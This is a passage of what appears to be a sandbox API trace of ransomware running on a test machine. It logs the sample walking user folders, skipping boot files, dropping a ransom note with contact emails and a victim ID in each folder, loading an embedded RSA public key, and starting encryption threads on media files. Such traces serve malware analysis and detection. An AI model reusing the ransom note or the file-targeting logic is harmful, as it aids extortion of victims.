lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0128.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0128.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0128.467] SetErrorMode (uMode=0x1) returned 0x1 [0128.467] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0128.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0128.467] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0128.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0128.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.467] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.467] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0128.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0128.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="Desktop") returned 0x0 [0128.467] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="DESKTOP") returned 0x0 [0128.467] SetErrorMode (uMode=0x1) returned 0x1 [0128.467] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT") returned 62 [0128.468] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0128.468] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0128.468] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x648) returned 0x0 [0128.468] RegQueryValueExW (in: hKey=0x648, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ce9fa0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3ce9fa0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0128.468] RegCloseKey (hKey=0x648) returned 0x0 [0128.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0128.468] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0128.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0128.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0128.469] WriteFile (in: hFile=0x648, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0128.470] CloseHandle (hObject=0x648) returned 1 [0128.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.471] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.471] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0128.471] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0128.471] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0128.471] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0128.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0128.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0128.471] SetErrorMode (uMode=0x1) returned 0x1 [0128.471] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0128.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0128.471] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0128.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0128.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.471] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.471] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0128.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0128.471] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="Desktop") returned 0x0 [0128.471] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="DESKTOP") returned 0x0 [0128.471] SetErrorMode (uMode=0x1) returned 0x1 [0128.471] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT") returned 61 [0128.471] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0128.472] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0128.472] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x648) returned 0x0 [0128.472] RegQueryValueExW (in: hKey=0x648, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cea1d0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cea1d0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0128.472] RegCloseKey (hKey=0x648) returned 0x0 [0128.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0128.472] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0128.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0128.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0128.473] WriteFile (in: hFile=0x648, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0128.473] CloseHandle (hObject=0x648) returned 1 [0128.473] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0128.474] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0128.474] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0128.474] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0128.474] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0128.474] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0128.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0128.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0128.474] SetErrorMode (uMode=0x1) returned 0x1 [0128.474] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0128.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.474] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0128.474] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde358 [0128.474] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0128.474] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0128.474] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.474] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.474] lstrcmpW (lpString1="D30YP5u1qzg5-VZ7306q.mkv", lpString2="..") returned 1 [0128.474] lstrcmpW (lpString1="D30YP5u1qzg5-VZ7306q.mkv", lpString2=".") returned 1 [0128.474] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.474] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="ntldr") returned 0x0 [0128.474] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="NTLDR") returned 0x0 [0128.474] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0128.474] StrStrW (lpFirst="D30YP5u1qzg5-VZ7306q.mkv", lpSrch="ntdetect.com") returned 0x0 [0128.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0128.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0128.475] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0128.475] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.475] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D30YP5u1qzg5-VZ7306q.mkv" | out: lpString1="D30YP5u1qzg5-VZ7306q.mkv") returned="D30YP5u1qzg5-VZ7306q.mkv" [0128.475] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x650 [0128.475] Sleep (dwMilliseconds=0x96) [0128.636] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.636] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0128.636] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0128.636] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.636] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0128.636] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0128.636] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0128.636] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0128.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0128.636] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0128.636] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0128.636] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.636] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0128.636] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x654 [0128.637] Sleep (dwMilliseconds=0x96) [0128.820] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.820] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.820] lstrcmpW (lpString1="J20J9-k9Q1AQR.swf", lpString2="..") returned 1 [0128.820] lstrcmpW (lpString1="J20J9-k9Q1AQR.swf", lpString2=".") returned 1 [0128.820] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.820] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="ntldr") returned 0x0 [0128.820] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="NTLDR") returned 0x0 [0128.820] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="NTDETECT.COM") returned 0x0 [0128.820] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="ntdetect.com") returned 0x0 [0128.820] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0128.820] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0128.820] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0128.820] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.820] lstrcpyW (in: lpString1=0x17cf1c, lpString2="J20J9-k9Q1AQR.swf" | out: lpString1="J20J9-k9Q1AQR.swf") returned="J20J9-k9Q1AQR.swf" [0128.820] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.820] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0128.821] Sleep (dwMilliseconds=0x96) [0128.970] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0128.970] lstrcmpW (lpString1="l0jm8.avi", lpString2="..") returned 1 [0128.971] lstrcmpW (lpString1="l0jm8.avi", lpString2=".") returned 1 [0128.971] StrStrW (lpFirst="l0jm8.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0128.971] StrStrW (lpFirst="l0jm8.avi", lpSrch="ntldr") returned 0x0 [0128.971] StrStrW (lpFirst="l0jm8.avi", lpSrch="NTLDR") returned 0x0 [0128.971] StrStrW (lpFirst="l0jm8.avi", lpSrch="NTDETECT.COM") returned 0x0 [0128.971] StrStrW (lpFirst="l0jm8.avi", lpSrch="ntdetect.com") returned 0x0 [0128.971] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0128.971] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0128.971] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS 